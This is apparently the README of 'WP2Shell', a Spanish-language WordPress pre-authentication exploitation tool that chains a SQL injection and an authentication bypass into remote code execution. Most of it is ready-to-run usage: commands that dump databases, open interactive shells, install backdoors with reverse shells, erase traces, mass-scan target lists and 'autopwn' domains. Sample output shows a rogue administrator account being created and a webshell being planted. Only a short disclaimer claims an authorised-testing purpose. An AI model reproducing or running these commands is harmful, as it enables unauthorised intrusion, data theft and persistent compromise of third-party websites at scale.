
Marco de explotación modular para WordPress pre-autenticación que encadena inyección SQL y bypass de autenticación para lograr ejecución remota de código, shells interactivas, backdoors y escaneo masivo de vulnerabilidades.
CVE-2026-63030 + CVE-2026-60137
Versión: 4.0.0
Autor: G0D150NE
WP2Shell es una herramienta de explotación de cadena completa para la ejecución remota de código pre-autenticación en WordPress. Combina dos vulnerabilidades críticas:
Esta herramienta permite comprometer por completo instalaciones vulnerables de WordPress sin ninguna autenticación, desde la detección hasta la RCE completa y la persistencia.
# Clone repository
git clone https://github.com/g0d150ne/wp2shell.git
cd wp2shell
# No dependencies needed - uses Python 3.8+ standard library
chmod +x wp2shell.py
python3 wp2shell.py [COMMAND] [OPTIONS] [TARGET]
python3 wp2shell.py check https://target.com
python3 wp2shell.py check https://target.com --confirm-timing --sleep 5
Huella básica:
python3 wp2shell.py read https://target.com
Extraer usuarios:
python3 wp2shell.py read https://target.com --preset users
Consulta personalizada:
python3 wp2shell.py read https://target.com --query "SELECT @@version"
Volcar toda la base de datos:
python3 wp2shell.py read https://target.com --preset dumpall --max-length 4096
Explotación básica:
python3 wp2shell.py exploit https://target.com
Explotación con shell interactivo:
python3 wp2shell.py exploit https://target.com --interactive
Explotación con instalación de puerta trasera:
python3 wp2shell.py exploit https://target.com --backdoor --lhost 192.168.1.100 --lport 4444
Explotación con volcado de base de datos:
python3 wp2shell.py exploit https://target.com --dumpdb
Explotación con limpieza (eliminar rastros):
python3 wp2shell.py exploit https://target.com --cleanup
python3 wp2shell.py shell https://target.com --user admin --password secret123 --interactive
python3 wp2shell.py shell https://target.com --user admin --password secret123 --command "whoami"
# Create targets file
echo "https://target1.com" > targets.txt
echo "https://target2.com" >> targets.txt
# Scan with 50 threads
python3 wp2shell.py masscan --file targets.txt --threads 50 --output results.csv
python3 wp2shell.py autopwn --domain example.com --lhost 192.168.1.100
Esto hará lo siguiente:
Tras la explotación, obtienes un shell interactivo completo:
python3 wp2shell.py exploit https://target.com -i
[*] Interactive shell — type 'exit' to quit
/var/www/html $ id
uid=33(www-data) gid=33(www-data)
/var/www/html $ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
...
/var/www/html $ exit
Inyección SQL (CVE-2026-63030)
/wp-json/batch/v1author_exclude es vulnerable a SQLi ciega basada en tiempoOmisión de autenticación (CVE-2026-60137)
/_embed░▒▓█▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓███████▓▒░▒▓███████▓▒░ ░▒▓███████▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓████████▓▒░▒▓█▓▒░ ░▒▓█▓▒░
CVE-2026-63030 + CVE-2026-60137
WordPress Pre-Auth RCE [v4.0.0]
+ G0D150NE
[1/7] Reconnaissance
Target: https://target.com
WordPress 6.9.3
[+] UNION extraction available (in-band, 1 request/value)
[2/7] Enumerating target
[+] Discovered table prefix: wp_
[3/7] Locating embed target
[+] Embed URL: https://target.com/2020/01/01/hello-world/
[4/7] Seeding oEmbed cache posts
[+] Seed payload delivered
[5/7] Extracting cache post IDs
[+] Cache IDs: [12345, 12346, 12347, 12348]
[6/7] Triggering escalation chain
[+] Administrator created via re-entry chain
[7/7] Deploying webshell
[+] Authenticated
[+] RCE confirmed
uid: www-data
[+] ========================================================
[+] TARGET COMPROMISED
[+] Admin: wp_service_a1b2 / G7hK9xQw2p$L!mN
[+] Shell: https://target.com/wp-content/plugins/cache_a1b2/cache_a1b2.php
[+] ========================================================
Esta herramienta es solo para pruebas de seguridad autorizadas y fines educativos. El uso contra sistemas sin permiso explícito es ilegal. Los autores no asumen ninguna responsabilidad por el mal uso.
¿Encontraste un error? ¿Quieres mejorar la herramienta? ¡Las pull requests son bienvenidas!
Licencia MIT: consulta el archivo LICENSE para más detalles.
| Comando | Descripción |
|---|
check | Confirmación no destructiva de vulnerabilidad |
read | Extrae datos mediante inyección SQL |
exploit | Cadena RCE completa pre-autenticación |
shell | Despliega webshell con credenciales existentes |
masscan | Escaneo masivo de múltiples objetivos |
autopwn | Descubrimiento automático → escaneo → explotación |
| Opción | Descripción |
|---|
--timeout | Tiempo de espera HTTP en segundos (predeterminado: 30) |
--proxies | Lista de proxies separada por comas (p. ej., http://127.0.0.1:8080) |
--stealth | Habilita el modo sigiloso con retardos aleatorios |
-v, --verbose | Habilita la salida de depuración |
-q, --quiet | Suprime el banner y los mensajes informativos |
| Opción | Descripción |
|---|
--prefix | Prefijo de tabla (predeterminado: wp_) |
--auto-prefix | Descubre automáticamente el prefijo de tabla |
--max-length | Máximo de caracteres por valor (predeterminado: 128) |
--technique | Técnica de extracción: auto/union/error/blind |
--preset | Preajuste de datos: fingerprint/users/dumpall |
--query | Expresión SQL arbitraria para extraer |
| Opción | Descripción |
|---|
--prefix | Prefijo de tabla (predeterminado: wp_) |
--no-discover | Omite el descubrimiento automático, usa los valores predeterminados |
-i, --interactive | Accede a un shell tras la explotación |
-c, --command | Ejecuta un único comando tras la explotación |
--backdoor | Instala una puerta trasera de persistencia |
--lhost | LHOST para el shell inverso (predeterminado: 10.0.0.1) |
--lport | LPORT para el shell inverso (predeterminado: 4444) |
--dumpdb | Vuelca la base de datos tras la explotación |
--cleanup | Elimina el usuario creado y la webshell al salir |
| Versión | Estado |
|---|
| 6.9.0 | ✅ Vulnerable |
| 6.9.1 | ✅ Vulnerable |
| 6.9.2 | ✅ Vulnerable |
| 6.9.3 | ✅ Vulnerable |
| 6.9.4 | ✅ Vulnerable |
| 7.0.0 | ✅ Vulnerable |
| 7.0.1 | ✅ Vulnerable |
| ≥ 7.0.2 | ❌ Parcheada |
| Técnica | Velocidad | Tamaño de datos | Requisitos |
|---|
| UNION | ⚡ Muy rápida | Ilimitado | El objetivo no debe filtrar UNION |
| Error | 🚀 Rápida | ~30 caracteres/solicitud | El objetivo debe exponer mensajes de error |
| Blind | 🐢 Lenta | Ilimitado | Oráculo booleano disponible |